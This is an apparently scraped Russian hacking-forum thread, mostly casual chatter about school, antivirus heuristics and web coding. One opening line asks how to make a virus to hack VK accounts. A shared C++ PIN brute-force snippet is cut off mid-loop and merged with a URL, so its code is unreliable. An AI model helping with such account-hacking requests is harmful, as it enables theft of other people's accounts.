пожалусто очень надо. активируйте.
XakeRs2015 [09:40:33]
Что копировать когда зосдаешь вирус для взлома вк?

BlackH
07.04.2015, 01:00
Цитата:

Сообщение от vladyxa13

С момощью кибер форума нашел неплохой докладный циклический метод перебора, который полность пашет

Делись давай)

vladyxa13
Цитата:

Сообщение от BlackH

Делись давай)

Ловишь?

C++ highlight

[LEFT][CODE]
string Find (string realPin) // передаем код, который нужно подобрать
{
string findedPin =
"****"
;
for
(uint j =
32
; j >>>http://www.cyberforum.ru/cpp-beginne...ead828201.html (https://hpc.name/redirector.html#http://www.cyberforum.ru/cpp-beginners/thread828201.html) вот ориджинал
Кароче я его прикрутил в свои кустарные условия. Просто по статье с васма все основываеться, на сколько я понял, из множеств.
А множество вида
Цитата:

1,2,3

равно множеству
Цитата:

1,3,2

ну сам понял что так далее, вариантов таких перестановок выйдет !3, что равно 6, 6 перестановок, кури https://ru.wikipedia.org/wiki/Множество (https://hpc.name/redirector.html#https://ru.wikipedia.org/wiki/Множество) , ну или тебя уже прокурили в универе или в школе. Ты где учился, кстати?
По поводу практики, хз когда напишу, думаю в этом месяце, ибо все эти праздники и учеба, которая началась, это такая запара....но я постараюсь.

vladyxa13
Цитата:

Сообщение от dell-1999

пожалусто помагитье мне я саздть антивирус низнаю коды

АХАХХА ОРУ!!!

glm1997
08.04.2015, 01:00
Ну теперь ваше - Агонь .

vladyxa13
Цитата:

Сообщение от glm1997

Ну теперь ваше - Агонь .

Вся для чладенький))) Спокойной ночи, я готовить хавать и спать!

glm1997
Цитата:

Сообщение от vladyxa13

Вся для чладенький))) Спокойной ночи, я готовить хавать и спать!

Лучше побегать, или проехаться на веле. А потом с чистой душой - нажраться во время просмотра фильма . Вот это збс .

i368
Цитата:

Сообщение от vladyxa13

АХАХХА ОРУ!!!

Опача , с каких это пор,детишки начали писать антивируявки?

- раньше вирусомания
- сегодня antivir :[

чет падазрительна
Не по теме:
Спросил у препода по оп, как реализовать евристический анализ,так она в ступоре стояла, и не могла ответить как он работает, учителя нинче "супер".

Так что ребят! К чему я веду, точнее вангую! - пилим статьи : " Реализация антивируса ". То xCore Antivirus и его сорцы уже староваты и не понятны для "саздателей антивирусявок".

pic4a
Цитата:

Сообщение от i368

Спросил у препода по оп, как реализовать евристический анализ

Что такое оп? офисное? А с чего бы вдруг преподу по оп нужно разбираться в работе AI?

i368
Цитата:

Сообщение от pic4a

Что такое оп? офисное? А с чего бы вдруг преподу по оп нужно разбираться в работе AI?

ОП - основы программирования, она так называет.

А разве у программиста не должно быть представления о работе антивируса? И как вообще работает евристический анализ ?

pic4a
Цитата:

Сообщение от i368

А разве у программиста не должно быть представления о работе антивируса? И как вообще работает евристический анализ ?

Может быть, но не должно. Программисты разные бывают. Например, embedded-софт. Там оно совершенно не нужно. В той сфере другие скилы важны. Или, веб-разработка.
А знания в области AI нужны тем, кто на этом деньги зарабатывает (бородатые дядьки в костюмах да программисты для подобных систем). В общем то, как работает эвристика в АВ все видим. Можно сделать выводы о том, что не те люди занимаются разработкой. Или цели другие стоят.

glm1997
Это что за херня у тебя в статусе. Или ты приписываешь подвиги нацистов - себе ?

i368
Цитата:

Сообщение от glm1997

Это что за херня у тебя в статусе. Или ты приписываешь подвиги нацистов - себе ?

Лол, шт@?

vladyxa13
Цитата:

Сообщение от glm1997

Я не приписываю, вот изменил, нравиться?
Ну и еще я за ЗОЖ!

i368
Цитата:

Сообщение от vladyxa13

Я не приписываю, вот изменил, нравиться?
Ну и еще я за ЗОЖ!

Ребят, вы о чем вообще? Какой статус? У кого?

vladyxa13
Цитата:

Сообщение от i368

Ребят, вы о чем вообще? Какой статус? У кого?

ну тот что под ником у нас. у тебя например "jmp" стоит

i368
Цитата:

Сообщение от vladyxa13

ну тот что под ником у нас. у тебя например "jmp" стоит

Теперь вдуплил :#
Будьте добрее!)))

vladyxa13
Цитата:

Сообщение от i368

Теперь вдуплил :#
Будьте добрее!)))

Слушаюсь сэр!!!

vladyxa13
17.05.2015, 01:00
аа
шо гуляю я как зверюга с друганамы, уже конец учебы, улица, пляжи, сонце жара и РНР)))
скор на лето в село уеду
как вы там живете ребятки?

vladyxa13
03.09.2015, 01:00
май вечер
php+html+css порн без вирусов смс и регистрации только у vladyx'и
IMAGE (https://hpc.name/redirector.html#https://pp.vk.me/c621917/v621917905/3bedc/pJk6T38drGw.jpg) https://pp.vk.me/c621917/v621917905/3bedc/pJk6T38drGw.jpg

Klint Istvud
06.09.2015, 01:00
Класный бложок!

ChEcHeNeC
08.09.2015, 01:00
Цитата:

Сообщение от vladyxa13

май вечер
php+html+css порн без вирусов смс и регистрации только у vladyx'и
IMAGE (https://hpc.name/redirector.html#https://pp.vk.me/c621917/v621917905/3bedc/pJk6T38drGw.jpg) https://pp.vk.me/c621917/v621917905/3bedc/pJk6T38drGw.jpg

И что тут такого в этом скрине? обычный шаблон вп , или ты хотел 'программитские' вкладки показать?

vladyxa13
08.09.2015, 01:00
прост нефиг делать было))

vladyxa13
23.10.2015, 01:00
2013.....
IMAGE (https://hpc.name/redirector.html#http://i58.fastpic.ru/big/2015/1023/67/fa01da2f0bb4f7833378d6dcfcf60f67.png) http://i58.fastpic.ru/big/2015/1023/67/fa01da2f0bb4f7833378d6dcfcf60f67.png

vladyxa13
24.10.2015, 01:00
мой день сегодня...

ШОК!
на данном творении художника запечетлено перегрев, фатал эррор и много других ошибок моего мозга связаных с двух часовым поиском в гугль
IMAGE (https://hpc.name/redirector.html#http://www.creative.su/sites/creative.su/data/XmUserFiles/userfiles/user7586/pic_014s.jpg) http://www.creative.su/sites/creative.su/data/XmUserFiles/userfiles/user7586/pic_014s.jpg

да, да, я нашел решение, но теперь мнне наверное прийдется переводить его с другого языка

Репортеры сообщат вам если что-то бабахнет, так что следите за последними новостями)

vladyxa13
30.10.2015, 01:00
qq

11010000100111111101000110000000110100001011100011 01000010110010110100001011010111010001100000100010 00010010000011010000101100000011111111010000101100 00001111111101000010110000001111111101000010110000 00111111110100001011000000111111110100001011000000 11111111010000101100000011111100100000000010101101 00001011000011010001100001011101000010110000110100 01100001011101000010110000001000001101000010110000 00111111110100001011000000111111001000001101000010 11111111010001100000001101000010111000110100001011 00101101000010110101110100011000001000100000110100 00101100001101000010110100110100001011110011010000 10110101110100001011110111010001100000110000101011 01000010111111110100011000000011010000101110001101 00001011001011010000101101011101000110000010001000 00110100001011111111010000101100001101000010111011 11010001100011001101000010110111110100001011000011 01000010110010110100001011010111010001100000101101 00001011010111010000101110111101000110001111110100 00101111000010000011010001100001011101000010111111 11010000101110100010000011010000101111111101000110 00000011010000101101011101000010110010110100001011 01011101000110000010001000001101000010110000110100 00101101001101000010111100110100001011010111010000 10111101110100011000001100001010110100011000000111 01000110000111110100001011000011010001100000011101 00011000001011010001100011001101000110001111001000 00110100001011011111010000101101001101000010111110 11010001100000001101000010111110110100001011001011 01000110001100001000001101000010110000110100001011 01001101000010111100110100001011010111010000101111 01110100011000001100001010

binary (https://hpc.name/redirector.html#http://php-zametki.ru/binary-text.html)

P.S. решение оказалось дерьмом, и я в дерьме и мы в дерьме
блог скатился отписка

блин(

vladyxa13
31.10.2015, 01:00
ыва дыба была пыва здохла пыва спилась от пыва
хз че делать..
пойду компайлер открою....

вообще дел дофига... а я сижу втыкаю

все шо я написал за час....

надо духом собраться и еще int main написать

vladyxa13
31.10.2015, 01:00
Через 2 мес НГ!

Xtn cj vyjq yt nj////

vladyxa13
01.11.2015, 01:00
Заснул в 5 вечера проснулся в пол 4 утра....

kipishnoy
03.11.2015, 01:00
Цитата:

Сообщение от vladyxa13

Заснул в 5 вечера проснулся в пол 4 утра....

Проверил все ли на месте и лег спать?

vladyxa13
Цитата:

Сообщение от kipishnoy

Проверил все ли на месте и лег спать?

Конечно, каждый день так делаю...)

Прост меня отрубило часов на 15(заснул дет в 2 часа дня и проснулся в 4 утра).
Ну приятно порадовала жрачка от родаков на столе возле Моника)

kipishnoy
Цитата:

Сообщение от vladyxa13

Конечно, каждый день так делаю...)

Прост меня отрубило часов на 15(заснул дет в 2 часа дня и проснулся в 4 утра).
Ну приятно порадовала жрачка от родаков на столе возле Моника)

Хорошо тебе. Последний раз я столько спал когда маленький был.

vladyxa13
Цитата:

Сообщение от kipishnoy

Хорошо тебе. Последний раз я столько спал когда маленький был.

Каникулы были и ещё малех переутомился))

kipishnoy
Цитата:

Сообщение от vladyxa13

Каникулы были и ещё малех переутомился))

Приуныл)